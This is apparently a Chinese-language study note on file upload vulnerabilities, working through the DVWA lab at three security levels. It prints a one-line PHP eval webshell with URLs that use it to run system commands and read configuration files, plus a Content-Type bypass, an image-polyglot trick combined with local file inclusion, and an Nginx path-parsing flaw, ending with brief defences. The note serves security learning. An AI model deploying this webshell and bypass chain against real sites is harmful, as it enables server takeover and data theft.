文件上傳-筆記
阿新 • • 發佈:2017-05-21
ini ner 圖片文件 3-9 pos -i http href 本地文件 網站常見功能,例如:上傳頭像
LOW
上傳成功phpinfo.php可訪問執行 http://192.168.3.88/dvwa/hackable/uploads/phpinfo.php
漏洞利用:以PHP為例,可上傳一句話webshell
cmd.php
<?php
@eval($_GET[‘cmd‘]);
?>
可用來執行各種php函數、命令。例如:
http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=phpinfo();
http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=system(dir);
http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=system(‘type c:\\phpstudy\\www\\dvwa\\php.ini‘);
medium.
上傳非圖片文件時通過改包修改發送的post請求包中的 Content-Type: image/jpeg 即可
high
我們嘗試後發現服務器會對我們上傳的文件的文件後綴、文件類型、文件內容進行驗證。
使用dos命令制作內含圖,把我們想要執行的文件與正常的圖片合並。
copy test.jpg/b+ phpinfo.txt/a phpinfo.jpg
利用本地文件包含漏洞進行調用執行
http://192.168.3.88/dvwa/vulnerabilities/fi/?page=file:///C:\phpStudy\WWW\DVWA\hackable\uploads\cmd.jpg
利用 Nginx解析漏洞 使用phpstudy模擬測試環境 查看php-ini配置文件中 cgi.fix_pathinfo=1 是否為1 如是則存在畸形解析
xxx.xxx/xxx.php 前一個文件存在的話會當成是php文件進行解析
防護:
對用戶上傳的圖片壓縮重新生成、文件重命名、存儲目錄權限設置、存儲目錄與網站分離
文件上傳-筆記